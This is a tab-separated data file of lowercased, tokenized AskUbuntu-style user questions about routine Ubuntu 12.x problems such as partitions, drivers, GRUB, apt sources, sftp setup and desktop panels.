276802	bookmark icons in nautilus	i know that when you are making a bookmark in nautilus the icon of the bookmark is the same as the folders icon but the problem is when i restart my pc the bookmark icon remains default until clicking on it . how can i fix this ? i 'm providing two screenshots made after reboot :
276803	i uninstalled virtualbox , do i get the allocated storage i gave it back ?	i installed virtualbox as i needed a quick way to use itunes so i did n't have to keep shutting down my laptop to use it and then restart it again to go back to linux . i think the installation failed though and i ca n't really be bothered to try and redo it , so i uninstalled it ( from the software center ) i just want to know if i can get the storage i allocated to windows ( 9.5 gb in this case ) back ? and if not , how do i get it back ?
276804	problem with games on flash and wine	i started using ubuntu 4 days ago and i really like it since i got bored with windows . but as always , i am playing a game via the internet like backyard monsters on facebook or moba like league of legends but there 's several problems . flash games are running very slowly , it 's like loading under 2 fps for both chromium and firefox , whilst i can watch youtube videos without any problems : ( i tried to look for solution like updating flash or increasing my cache but always nothing . same for league of legend i succeed to run it after 2 days googling . i am running it under playonlinux with wine 1.5 and it shows between 10fps and 30 fps with very low options . i was running it perfectly with min 60 fps with high options running under ubuntu 12.10 . i have 8gb ram and an ati radeon hd 4530 . i have a doubt that linux did n't correctly install my graphics card anyways when i go to software source > additional driver i can find anything to install or has this happened because i choose a free version of ubuntu ? ( sorry for my english i hope you understand me to help me fast ) ( i never want go back to windows coz it 's ** keep linux for ever : ) \m/ )
276810	how to change number format in locale for gnucash ?	when i start gnucash it displays negative numbers in `` € 100,0- '' format , while i want it like `` € -300.0 '' how can i change it ? locale settings : ~ $ locale lang=en_us.utf-8 language=en lc_ctype= '' en_us.utf-8 '' lc_numeric=nl_nl.utf-8 lc_time=nl_nl.utf-8 lc_collate= '' en_us.utf-8 '' lc_monetary=nl_nl.utf-8 lc_messages= '' en_us.utf-8 '' lc_paper=nl_nl.utf-8 lc_name=nl_nl.utf-8 lc_address=nl_nl.utf-8 lc_telephone=nl_nl.utf-8 lc_measurement=nl_nl.utf-8 lc_identification=nl_nl.utf-8 lc_all=
276811	how can i find out the proxy address i am behind ?	i am behind a proxy , but i do n't know the url/port . is there a way to find this out ? thanks ,
276819	why ca n't i see jpg images in kijiji upload	i am trying to upload images for an ad in kijiji and i ca n't sof ee all the jpg images present on my desktop when i want to upload them . i can see them as jpg images on the desktop but not on the kijiji upload screen , though it shows some of my images .
276820	audio problems after resuming from suspend/sleep	my audio become broken or garbled after waking up from suspend . i find i need to do a restart to get my audio to work . any ideas on what to do ?
276821	kernel & dkms virtualbox error	i 've been trying for weeks now . i ca n't run my windows xp virtual machine because of the error : kernel driver not installed ( rc=-1908 ) the virtualbox linux kernel driver ( vboxdrv ) is either not loaded or there is a permission problem with /dev/vboxdrv . please reinstall the kernel module by executing '/etc/init.d/vboxdrv setup' as root . if it is available in your distribution , you should install the dkms package first . this package keeps track of linux kernel changes and recompiles the vboxdrv kernel module if necessary . i already installed the correct 3.4.0 headers and images . but when i run the setup command i get : user @ chrubuntu : ~ $ sudo /etc/init.d/vboxdrv setup -- kernelsourcedir /d * stopping virtualbox kernel modules [ ok ] * uninstalling old virtualbox dkms kernel modules [ ok ] * trying to register the virtualbox kernel modules using dkms error ! your kernel headers for kernel 3.4.0 can not be found . please install the linux-headers-3.4.0 package , or use the -- kernelsourcedir option to tell dkms where it 's located * failed , trying without dkms * recompiling virtualbox kernel modules * look at /var/log/vbox-install.log to find out what went wrong i 'm using acer c7 chromebook . please help .
276822	how to disconnect from wireless connection manually using the command line without using network manager ?	i do n't want to use wicd or network-manager . what should i type to disconnect ? edit : this one is different from the ones above , i want to disconnect . another thing , i do n't want use wicd nor network-manager . as a prove , the answer below is not the same as the answers provided in these questions .
276824	unable to access ntfs partitions since upgrading to 12.10 ?	i have recently upgraded to ubuntu 12.10 . i dual boot between windows xp and ubuntu however when i was running my previous version of ubuntu , 8.10 , i could see and access my windows partitions in ubuntu . after upgrading , however , i am no longer able to access these partitions . any idea how i can resolve this issue ?
276825	dual boot windows 8 on already installed ubuntu	i had three drives on my computer : c : d : e : i installed ubuntu 12.04 on the e : partition and now i 'm using grub boot manager to boot into windows 7 and ubuntu i 'm planning to install windows 8 by removing windows 7 on c : , but i do n't want my old ubuntu installation to suffer . is there are way that after windows 8 removes grub from c : that i 'm able to boot to ubuntu again .
276830	connot hear sound when connecting my toshiba ( intel i3 ) laptop to my tv	i tried connecting my toshiba laptop with intel® core™ i3 cpu m 330 @ 2.13ghz × 4 processor to my tv using a hdmi connector . though i can receive images on my tv , i still get audio my laptop speakers and not my tv . my graphics type is shown as unknown in the system settings . can you please help me with this ? thank you and regards ,
276832	gnome session manager warning when running gnome fallback	i followed fossfreedom 's guide on how to install gnome-classic in 12.04 and i get this error when trying to run gnome-fallback in a terminal . i tried to log in with it first but it did n't work either . $ gnome-session-fallback warning : failed to acquire org.gnome.sessionmanager i 've installed prerequisites and myunity . i 'm running 12.04.2 with the latest updates . when running $ sudo gnome-session-fallback i get a huge error message . what should i do ?
276833	what is the difference between `` ifconfig interface down '' and `` rfkill block '' ?	i know rfkill block all will disable everything . but what about ifconfig interfacex down ? when i use it , it just drops the connection . and when i type ifconfig interfacex up it reconnects to my old connection . so does ifconfig interfacex down disable the wireless too ?
276836	how do you convince ubuntu 's installer to put grub on a separate partition ?	when i installed ubuntu on my laplet ( tabtop ? ) , i very explicitly selected my usb drive as the destination for grub . the laptop is natively a windows 8 machine , and the idea was to not even touch the native bootloader , and instead have the machine boot to ubuntu whenever i had my usb drive plugged in . should work in theory . naturally , post installation , i tested this by removing the usb drive , and sure enough grub fired right up . adding insult to injury , grub is n't able to boot windows 8 at all , leaving me with an ubuntu-only machine on a primarily touch-based device . not fun . i 'm pretty sure i can figure out how to get windows fixed ; my issue is that it should n't have happened in the first place . did i miss some magic checkbox in the installer ? is the installer perhaps bugged ? ( this was ubuntu 12.10 btw . ) there 's a step in the installer where you select the destination for grub , and i checked and double checked that i had selected my usb drive ( the same drive the installer itself was running from ) for the install and it did n't complain . i 'm not sure what i did wrong .
276839	how to remove typed-in urls from browser history in firefox ?	i know i can remove visited pages from the history via history→show all history , and simply mark the unwanted entries plus hit the delete key . but this seems not to remove the urls i 've typed into the address bar when calling up those pages . so they are still used to predict the urls i want to type in later . especially with sites one heavily frequents ( like here on the stackexchange network ) , this clutters up the list of suggested urls . is there any way to remove the `` typed urls '' from the browser history completely ? preferable with some easy clicks for the end-user -- but i would n't mind doing so via command-line if necessary ( e.g . modifying firefox 's sqlite databases directly ) . edit : thanks to dan 's answer a part of my issue is explained -- and i found out i missed to fully describe it . until reading dan 's explanations , i did n't see some of the details . so let 's say i 've visited http : //readwrite.com/somearticle and http : //readwrite.com/otherarticle . and of course a lot of other pages having an `` r '' somewhere in their url . now , on an empty urlbar , i type an `` r '' . immediately , auto-complete fills that up with `` readwrite.com '' ( not one of the full urls ) , and the drop-down shows a bunch of other pages ( but none from readwrite.com ) . dan 's first method does n't work , as the auto-completed string is not contained in the dropdown dan 's second suggestion ( switching auto-complete off altogether ) is no option for me , i just want to get rid of some specific `` suggestions '' i have no matching bookmark ( to be more specific : none for readwrite.com ) so how to get rid of that `` readwrite.com '' suggestion ? i 've checked the entire history and made sure there 's no entry left for it . i 've also checked my bookmarks , no traces there either .
276841	create database	i want to create database . i know that i should use the following code : mysqladmin -h localhost -u { username } -p create lrs i do n't know if something should be replaced with username located between ' { ' and ' } ' in the above code . please help me . thank you .
276845	how to read corrupt disc	i have a corrupt mini dvd , which was used in a camcorder . it appears to be corrupt ( did not play on camcorder ) and wo n't open . i do n't know what to try to fix it . is there a way ? billy @ marara-ubu : /media $ sudo mount -t udf -o ro /dev/sr0 /media/cd mount : wrong fs type , bad option , bad superblock on /dev/sr0 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so billy @ marara-ubu : /media $ sudo mount -t iso9660 -o ro /dev/sr0 /media/cd mount : wrong fs type , bad option , bad superblock on /dev/sr0 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so billy @ marara-ubu : /media $ sudo cdrwtool -i -d /dev/sr0 using device /dev/sr0 448kb internal buffer setting write speed to 12x disc info : erasable : no border = 2 disc status = 1 number of first track = 1 number of sessions = 1 number of tracks = 1 status of last track = 3 uru = 1 did_v = 0 dbc_v = 0 disc type = 0 disc_id = 0 lead_in = 00:00:00 ( 0 ) lead_out = 00:00:00 ( 0 ) opc entries = 0 track info : track 1 track_number = 1 session_number = 1 damage = 0 copy = 0 track_mode = 4 rt = 1 blank = 1 packet = 1 fp = 0 data_mode = 1 lra_v = 0 nwa_v = 0 track_start = 0 next_writable = 0 last_recorded = 0 free_blocks = 12272 packet_size = 16 track_size = 12272 ( 24544kb ) track 2 track_number = 2 session_number = 1 damage = 0 copy = 0 track_mode = 4 rt = 1 blank = 1 packet = 1 fp = 0 data_mode = 1 lra_v = 0 nwa_v = 0 track_start = 12288 next_writable = 12288 last_recorded = 0 free_blocks = 176 packet_size = 16 track_size = 176 ( 352kb ) track 3 track_number = 3 session_number = 1 damage = 1 copy = 0 track_mode = 4 rt = 0 blank = 0 packet = 1 fp = 0 data_mode = 1 lra_v = 0 nwa_v = 0 track_start = 12480 next_writable = 0 last_recorded = 0 free_blocks = 0 packet_size = 16 track_size = 701472 ( 1402944kb )
276847	running gnome-terminal with no window border on startup in xubuntu 12.10	i created a script to launch a session of gnome-terminal when i log into xubuntu . i specifically wanted it in a specific position on the window , and with no window borders ( surprisingly , there 's no easy option for this in gnome-terminal , unlike xfce4-terminal ) . after a bunch of googling and trying about 10 methods that did n't work , i ended up with the following scripts , in bash and python . my executable bash script , which i placed in $ home/bin : # ! /bin/bash flags [ 0 ] = '' -- hide-menubar '' flags [ 1 ] = '' -- geometry=80x54+0-0 '' flags [ 2 ] = '' -- window-with-profile=default2 '' flags [ 3 ] = '' -- working-directory= { $ home } '' gnome-terminal $ { flags [ @ ] } -x bash -c 'sleep 5 ; { $ home } /bin/undecor.py ; bash' the corresponding executable python script , in the same directory : # ! /usr/bin/python import gtk.gdk root_window = gtk.gdk.get_default_root_window ( ) root_xid = root_window.property_get ( `` _net_active_window '' ) [ 2 ] [ 0 ] w = gtk.gdk.window_foreign_new ( root_xid ) w.set_decorations ( false ) gtk.gdk.window_process_all_updates ( ) i put the flags in an array in the bash script just so i could easily tell what was going on if i need to edit the particular arrangement later . note : i 'm doing this in python 2.7.3 . i did n't test it in python 3.x the reason for most of the weirdness in the last line of the bashscript is that i found it really difficult to run a command in a new gnome-terminal window and keep it open after the command is finished executing . the second big issue is that on startup , without running the sleep command , my python script runs before the window is formally created ( i think ... ) and somewhere in the python script i start getting nonetypes instead of the real window objects , etc . and the pyscript never successfully undecorates the window . so what i 'm asking is if anyone can think of a less hacky way to do this . i 'd really like to use just python , but i could n't find an easy way to do in either the os or gtk module . i read a few other solutions that involved things like compiz or openbox , but i wanted a way to do that without installing anything new . i 'm not even sure if this works in other environments . thanks ! sorry if this question is long , i wanted to do my homework first . ( also , note to xubuntu users , you need to make sure you are launching gnome services on startup )
276851	missing firmware for pci-802n in 12.10	have spent several hours trying to figure out how to install this wireless card . seems it worked out of the box in 9.1 but no longer supported . several tutorials for older distros did n't work . 03:05.0 network controller : ralink corp. rt3062 wireless 802.11n 2t/2r subsystem : ralink corp. rt3062 wireless 802.11n 2t/2r flags : bus master , slow devsel , latency 64 , irq 20 memory at fdee0000 ( 32-bit , non-prefetchable ) [ size=64k ] capabilities : < access denied > kernel driver in use : rt2800pci kernel modules : rt2800pci any help would be appreciated .
276859	drive partition missing after installing ubuntu	drive partition missing after installing ubuntu , looks like the partitions have merged together and files on the missing partition are not there . i have opted to use ubuntu instead of windows and i just installed the ubuntu os on my 1 tb hdd . before installing ubuntu , i created three partitions on my hard drive using the disk management tool in windows . the first partition was about 42 gb in size . the second and third partitions were around 400 gb and 500 gb respectively . once i booted into the ubuntu os from the dvd , i selected something else from the install screen and i marked the 42 gb partition to be the root and another 100 mb partition which was created by the os itself as the swap space . now , this is the place where i made a mistake , i could find the other two partitions in the same menu not as two separate partitions but as a single partition of about 900 gb space and i had a thought that it will mount them separately once the installation is complete . after installation , i could not find the 500 gb partition and all its files rather i found the other partition ( having the same name as i gave it when i was using windows ) to be of larger capacity of about 900 gb and those few files i had in them . now i really need those files from the missing partition . please help me .
276860	how to fix my apt-get sources ?	after i poked some in sources.list adding cassandra and so i get an apt-get error : h채mtade 2 484 kb p책 7s ( 345 kb/s ) w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/release could not find expected post `` contrib/binary-amd64/packages '' i release-filen ( felaktig post i sources.list eller felformulerad fil ) e : some index files could not be fetched the contents of the file is # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / dists/precise/main/binary-i386/ # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / dists/precise/restricted/binary-i386/ # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / precise main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //se.archive.ubuntu.com/ubuntu/ precise main restricted deb-src http : //se.archive.ubuntu.com/ubuntu/ precise main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //se.archive.ubuntu.com/ubuntu/ precise-updates main restricted deb-src http : //se.archive.ubuntu.com/ubuntu/ precise-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //se.archive.ubuntu.com/ubuntu/ precise universe deb-src http : //se.archive.ubuntu.com/ubuntu/ precise universe deb http : //se.archive.ubuntu.com/ubuntu/ precise-updates universe deb-src http : //se.archive.ubuntu.com/ubuntu/ precise-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //se.archive.ubuntu.com/ubuntu/ precise multiverse deb-src http : //se.archive.ubuntu.com/ubuntu/ precise multiverse deb http : //se.archive.ubuntu.com/ubuntu/ precise-updates multiverse deb-src http : //se.archive.ubuntu.com/ubuntu/ precise-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //se.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb-src http : //se.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu precise-security main restricted deb-src http : //security.ubuntu.com/ubuntu precise-security main restricted deb http : //security.ubuntu.com/ubuntu precise-security universe deb-src http : //security.ubuntu.com/ubuntu precise-security universe deb http : //security.ubuntu.com/ubuntu precise-security multiverse deb-src http : //security.ubuntu.com/ubuntu precise-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu precise partner # deb-src http : //archive.canonical.com/ubuntu precise partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu precise main deb-src http : //extras.ubuntu.com/ubuntu precise main deb http : //us.archive.ubuntu.com/ubuntu/ precise multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ precise multiverse deb http : //us.archive.ubuntu.com/ubuntu/ precise-updates multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ precise-updates multiverse deb http : //repository.spotify.com stable non-free deb http : //archive.canonical.com/ precise partner deb-src http : //archive.canonical.com/ precise partner deb http : //www.apache.org/dist/cassandra/debian 10x main deb-src http : //www.apache.org/dist/cassandra/debian 10x main deb http : //us.archive.ubuntu.com/ubuntu/ precise main contrib non-free can you please help me fix it ?
276862	purging vista from ubuntu that 's partitioned ; mechanism and how to	im a recent convert to ubuntu . when i installed ubuntu , i did it alongside of existing vista . ( before that , a friend partitioned my hd to make room ) . im so satisfied with ubuntu that i 'm getting rid of vista gradually . currently , vista is taking up 80g and 50g is free . another 80g or so is allocated for ubuntu . now , its mechanism : am i right to visualise that in my computer , vista and ubuntu are like two separate rooms next to each other ; so , if you clear out one room , that does not make room for the other room ? or , is this still one room so that as i keep downloading with ubuntu , it would make use of the free 50g space in vista section automatically ? is getting rid of the partition wall advisable ( now that i have successfully installed ubuntu ) ? if possible ? or is the partition still of some use ? thank you for your advice in advance .
276863	need help in sed and awk	i have a file `` list '' as following : main.c getname 25 main.c getage 36 util.c namecheck 123 the above has first string file name , second function name , and third line no . i want to : open the file ( 1st column ) go to line no ( 3rd column ) edit the string ( 2nd column ) . ex : open the file main.c , change the string getname to getname ( ) in line no 25 does anyone know how to do the above using sed and awk ? i tried to use the following . but it does n't work awk ' { sed -e `` $ 3s/ $ 2/ & ( ) '' < $ 1 > $ 1_new } ' list
276865	secondary hdd problems with gnome	i have two hdds running in my computer , however when i logon using gnome , the drives do not appear unless i logout , log back in using the default ubuntu shell , open the drives , then logout and back in with the gnome shell.i tried using gparted to mount the drives , but the option is greyed out.i am using ubuntu 12.10 64 bit . any help would be appreciated .
276866	ubuntu 12.10 - problems with installing nvidia drivers	i have some big problems with installing the latest nvidia drivers on my ubuntu 12.10 at a notebook . 2 weeks ago , i have tested the ubuntu 12.04 and i got no problems with it . i have just downloaded the latest drivers , opened a shell stopped the server x and installed it . everything was fine . but it is n't in the version 12.10 . so i have checked out the net for some instructions and i have read that i must download kernel modules ( header & sources ) to install it . so i have downloaded these packages , and tried it again . i was able to install the driver and so i rebooted the os . after i lodged in , i could n't see the 'launcher ' on the right side and the symbols on the top . also the desktop size was a little bit changed ... it 's really weird , i hope you can help me ! thanks in advance ! kind regards ,
276869	how to type in two languages ?	how can i type persian and english in ubuntu 12.10 ? and how can i switch between these two languages like windows ( alt+shift ) ?
276871	getting started with zend	i have a zend framework installed on my pc and when i add some actions in index controller i get a 404 error , but if i write some actions on another controller let 's say testcontroller the file will be sent to browser . my apache2.conf configuration is : # accessfilename : the name of the file to look for in each directory # for additional configuration directives . see also the # directive . # accessfilename .htaccess # # the following lines prevent .htaccess and .htpasswd files from being # viewed by web clients . # < files ~ `` ^\.ht '' > order allow , deny deny from all satisfy all my configuration for etc/apache2/sites-available/default is : < virtualhost *:80 > serveradmin webmaster @ localhost documentroot /var/www < directory / > options followsymlinks allowoverride all < /directory > < directory /var/www/ > options indexes followsymlinks multiviews allowoverride all order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined < /virtualhost > my configuration for /etc/apache2/sites-enabled/zendexample.local is : documentroot `` /var/www/zendexample/public '' servername zendexample.local # this should be omitted in the production environment setenv application_env development < directory `` /var/www/zendexample/public '' > options indexes multiviews followsymlinks allowoverride all order allow , deny allow from all < /directory > < /virtualhost > same code for etc/apache2/sites-available/zendexample.local at comand sudo a2enmod rewrite the answer is : module rewrite already enabled i give restart and reload commands to apache server . in the end of post i repeat 404 error appears only on indexcontroller actions ( root path ) if i put the same code in other controller ( using same model ) and implicit create a new folder ( test ) in scripts everytihing seems go well .
276872	ubuntu 12.10 on oracle vm	tried installing ubuntu 12.10 on oracle vm , when installation is complete , the desktop doesnt show or its just blank , please help ? thanks narayana
276873	how to wildcard directories and all files in them	lets say i wanted to wildcard directories and then wildcard all files in those directories . how would i do so ? i know * is to wildcard all files , but i do n't know how to wildcard directories . for example pdf2djvu -o /dir/ [ wildcard dirs ] / [ wildcards.djvu ] /dir/ [ wildcard dirs ] / [ wildcards.pdf ] on a secondary note can such a wildcard be affected if the location had a space where normally typing with `` '' for spaces it would be better to use \ - this time ? i tried what i posted above using the standard * for the wildcard dirs and wildcard files like /dir [ entire dir had no spaces ] /*/*.djvu but got the following error i/o error ( basic_ios : :clear )
276877	unable to find windows files using unbuntu	i 'm using a samsung rv520 i3 . windows 7 crashed and fails to load past the initial windows logo screen . i am now using unbuntu 12.10 form a usb i 'm trying to find files i had saved on windows before windows crashed . my problem is i ca n't find the files or windows partition anywhere . i 'm not really competent using linux systems and using terminals so its not really that surprising . can any one help ?
276881	setting up sftp-only users breaks ssh connections	i have a cluster of machines ( lan ) set up for password-less ssh login for running code in parallel . no problems with the ssh or functionality , however ... i 'm trying to set up an sftp-only ( no shell ) user on the gateway machine for external ( outside the cluster ) file transfers to the gateway machine . i created a new group and user following the guide here ( http : //blog.swiftbyte.com/linux/allowing-sftp-access-while-chrooting-the-user-and-denying-shell-access/ ) , and edited the /etc/ssh/sshd_config file as appropriate . however , when i restart the ssh server , the gateway machine is no longer accessible through ssh or sftp . any attempt is met with a `` connection refused '' message . if i switch back to the original sshd_config file , i can connect again . is there any known issue with setting subsystem sftp internal-sftp that causes ssh functionality to disappear ? or any suggestions for something i might be missing ? my sshd_config file addition is as follows : subsystem sftp internal-sftp match group sftponly chrootdirectory % h x11forwarding no allowtcpforwarding no forcecommand internal-sftp my sftp-user has their home directory specified on an external drive that is auto-mounted at boot . their home directory has root ownership and 755 permission .
276882	no drawer item in add to panel list in 12.04 gnome-panel	title says it all . i can not add a drawer to my panel as there is no selection for drawer . thanks , susan
276884	burning windows 7 iso to an internal hdd	background i took a hdd from a new laptop i bought and replaced it with an ssd and placed the cheap hdd enclosure i bought from amazon . i recently discovered after trying to format the hdd using gparted there was either a problem with the enclosure or the hdd itself . i then took the hdd out of the enclosure and plugged it directly into my desktop computer ( the one i 'm trying to install windows 7 on ) . issue i managed to format the hdd to fat32 and it 's completely empty . i have searched for a while but have n't been able to fathom a way to make the hdd bootable using the windows 7 iso . i usually do it using unetbootin when the hdd is external , however this time it 's internal . i do n't know if i need grub or anything else . i 'm fairly new to linux , any help on the subject would be appreciated . ( i have searched for about 30 minutes and are yet to find an answer on the subject , but i am sorry if this issue has been addressed before - as i 'm sure it has ) .
276885	accidentally disabled my samsung hm1200 bluetooth headset and ca n't enable it again	so i was setting up my bluetooth headset to my ubuntu 12.10 desktop just for kicks , and i made a mistake . in sound settings under the output tab , i changed the `` mode : '' to `` off '' . the headset has now disappeared from the sound settings entirely , however it is still connected to bluetooth . no change even after i disconnect and reconnect the headset ( forget device and set up again ) . is there maybe a config file where i can adjust a line to make it revert to default ? similar to this , link , but his solution of : $ pactl list cards short 0 alsa_card.pci-0000_01_00.1 module-alsa-card.c 1 alsa_card.pci-0000_00_14.2 module-alsa-card.c 4 bluez_card.0c_14_20_28_4e_17 module-bluetooth-device.c and running the command : $ pactl set-card-profile bluez_card.0c_14_20_28_4e_17 a2dp gave me the result : failure : no such entity oh , and it was really loud ( while it was working , which is why i was messing with the settings to begin with ) even with 1 % volume . not sure if that can be easily fixed . what do you think ? thanks in advance .
276889	/usr/lib/apt/methods/ppa could not be found	after using ubuntu 12.10 for two weeks i ran into problems updating the package database . running sudo apt-get update returns the following error : e : the method driver /usr/lib/apt/methods/ppa could not be found . this might have to do with the custom theme i installed via ppa : sudo add-apt-repository ppa : upubuntu-com/gtk+3.6 sudo apt-get update sudo apt-get install mountain-lion-theme what could cause this error and how can i fix this . thanks for your answers .
276892	can not find -lgfortran	i 'm trying to install a package in r ( package `` ks '' ) . it fails with error message : /usr/bin/ld : can not find -lgfortran i 've already installed the ubuntu package build-essential : sudo apt-get install build-essential i 've also tried adding symbolic links : sudo ln -s /usr/lib/x86_64-linux-gnu/libgfortran.so.3 /usr/lib/libgfortran.so sudo ln -s /usr/lib/libgfortran.so.3.0.0 /usr/lib/libgfortran.so sudo ldconfig i use gcc and g++ regularly , but have n't yet had reason to use gfortran . i 've seen others with this problem on gcc-4.7 ( http : //ubuntuforums.org/showthread.php ? t=2123821 ) , so i wonder if this is from manually installing gcc-4.7 . i followed the recipe from the accepted answer here here and here here . running lsb_release -a prints ubuntu 12.04.2 lts and running uname -r prints 3.2.0-39-generic-pae can anyone offer advice for why ld does n't work ?
276893	what does php use if multiple mtas are installed ?	i 'm just wondering what happens if i have sendmail installed , and subsequently installed postfix , what will php use when i use the mail command ? will having 2 mtas installed cause any other problems ? i 'm very new at this , so thanks for your help .
276894	ubuntu 12.04 can not remove directory	i am using dual operating system on a single machine- windows and ubuntu . there is a folder in windows c : \programdata\folder_name which seems to be a virus to me , as it does not get deleted whenever i try to . also , it comes up again and again even if i try to delete it . i tried to delete it from ubuntu . and this worked hopefully ! ! ! but today , i got again the same folder at same location . i again tried to delete it from ubuntu , using user @ user $ sudo su root @ user $ rm -f /location/to/folder rm : can not remove `/location/to/folder ' : is a directory root @ user $ sudo umount /location/to/folder umount : /location/to/folder : not mounted root @ user $ rm -r /location/to/folder rm : can not remove `/location/to/folder ' : directory not empty root @ user $ ls -a /location/to/folder ls : reading directory /location/to/folder : input/output error so , i tried unmounting it , which says it is not mounted . i tried rm which says it is directory . can anybody help me please ? edit : here is the output with ls -la command when not inside that directory , going inside the directory and executing ls -la command gives the input/output error . drwx -- -- -- 1 ashutosh ashutosh 8192 apr 2 01:01 . drwx -- -- -- 1 ashutosh ashutosh 24576 apr 1 23:15 .. drwx -- -- -- 1 ashutosh ashutosh 0 feb 20 22:00 adobe lrwxrwxrwx 2 ashutosh ashutosh 84 jul 14 2009 application data - > /media/10dc42b6dc42963e/programdata drwx -- -- -- 1 ashutosh ashutosh 0 jan 27 02:55 ati drwx -- -- -- 1 ashutosh ashutosh 0 mar 20 14:40 avangardo drwx -- -- -- 1 ashutosh ashutosh 0 feb 19 02:35 connectify drwx -- -- -- 1 ashutosh ashutosh 0 feb 18 02:32 daemon tools lite drwx -- -- -- 1 ashutosh ashutosh 4096 apr 2 01:01 dc48ccc40d3c963e0000dc47f0809abc lrwxrwxrwx 1 ashutosh ashutosh 120 jul 14 2009 desktop - > /media/10dc42b6dc42963e/users/public/desktop lrwxrwxrwx 2 ashutosh ashutosh 128 jul 14 2009 documents - > /media/10dc42b6dc42963e/users/public/documents drwx -- -- -- 1 ashutosh ashutosh 4096 mar 9 20:40 eps lrwxrwxrwx 2 ashutosh ashutosh 128 jul 14 2009 favorites - > /media/10dc42b6dc42963e/users/public/favorites drwx -- -- -- 1 ashutosh ashutosh 8192 mar 13 02:26 microsoft drwx -- -- -- 1 ashutosh ashutosh 8192 feb 18 02:35 microsoft help -rw -- -- -- - 1 ashutosh ashutosh 434 feb 3 17:49 ntuser.pol drwx -- -- -- 1 ashutosh ashutosh 32768 feb 18 02:51 package cache drwx -- -- -- 1 ashutosh ashutosh 0 feb 18 03:19 preemptive solutions drwx -- -- -- 1 ashutosh ashutosh 0 feb 18 02:48 regid.1991-06.com.microsoft drwx -- -- -- 1 ashutosh ashutosh 0 feb 10 14:44 samsung drwx -- -- -- 1 ashutosh ashutosh 0 mar 19 12:05 skype lrwxrwxrwx 2 ashutosh ashutosh 200 jul 14 2009 start menu - > /media/10dc42b6dc42963e/programdata/microsoft/windows/start menu drwx -- -- -- 1 ashutosh ashutosh 0 jan 29 23:28 sun drwx -- -- -- 1 ashutosh ashutosh 0 mar 21 03:35 temp lrwxrwxrwx 2 ashutosh ashutosh 196 jul 14 2009 templates - > /media/10dc42b6dc42963e/programdata/microsoft/windows/templates drwx -- -- -- 1 ashutosh ashutosh 4096 feb 18 03:21 windows app certification kit
276897	gnome classic - automatically add panel when external monitor is connected	similar to : with xmonad / gnome , switch gnome-panel between monitors while at my desk , i use two external monitors with laptop lid shut . when mobile , i use my laptop display of course . i like to have a bottom panel with window switcher on each monitor , so whenever i connect my laptop to dock , i have to make a new bottom panel and add whatever plugins/icons/things i want to it , but i have to do it every single time . i do not want two panels on my laptop when not connected to external displays . i also do n't want it to just autohide so it does n't get in the way . how can i configure this extra bottom panel to automatically add itself only when my external/second monitor is connected and remove itself when disconnected ? thanks !
276901	how many years of support i would get if i install multiple desktop environments ?	ubuntu 12.04 lts has 5 years of support . other flavors have different support so ... what if i install ubuntu first , then i install lubuntu-desktop ( which has shorter support time ) ? would the de independent parts ( eg . the kernel , core drivers , firefox ( because it uses xul ) ) of the system still get updates for 5 years , even if i use lxde instead of unity ? ( i 'm still use 10.04 lts desktop , but since it will be trashed soon , i 'm planning to upgrade . ) so clarifying the question a bit with an example : if i install ubuntu 12.04 lts i will get : linux kernel + core stuff + gnome3 + unity = > 5 years of support . if i install lubuntu 12.04 i will get : linux kernel + core stuff + lxde = > 6 months ( ? ) . so i install ubuntu 12.04 first , i have : linux kernel + core stuff + gnome3 + unity , then i remove gnome and unity , then do an apt-get install lubuntu-desktop . so i will have linux kernel + core stuff + lxde again . now would i have 5 years supprt time because i installed the ubuntu lts first or just 6 months because i can not cheat the system ? by support time i mean the repositories are alive , i get security patches , firefox updates , etc .
276911	how to rename partitions ?	i 'm new at ubuntu ; i installed ubuntu 12.10 and the partitions appear like 30 gb volume and like 78ef-2c5e in task bar . i tried to rename it but rename and remove buttons are deactivated so i tried by using disks but it gives me error ( error setting label : command-line `mlabel -i `` /dev/sdb8 '' : : '' windows '' ' exited with non-zero exit status 1 : total number of sectors ( 18550784 ) not a multiple of sectors per track ( 63 ) ! add mtools_skip_check=1 to your .mtoolsrc file to skip this test ( udisks-error-quark , 0 ) ) and this happen also to any attached usb to my laptop ... please help ..
276915	how do i create a custom config file in xboxdrv ?	i just got a wireless xbox 360 controller with a usb receiver . i have tried to use xboxdrv to get it working as a mouse . the -- mouse command works alright , but i wanted to customize some of the buttons . i have looked here , but i 'm not particularly sure of my way around terminal , so i would n't mind a bit of help . i understand you have to use -- ui-buttonmap btn=sym but i do n't see how to put them all together in a file . could someone explain ?
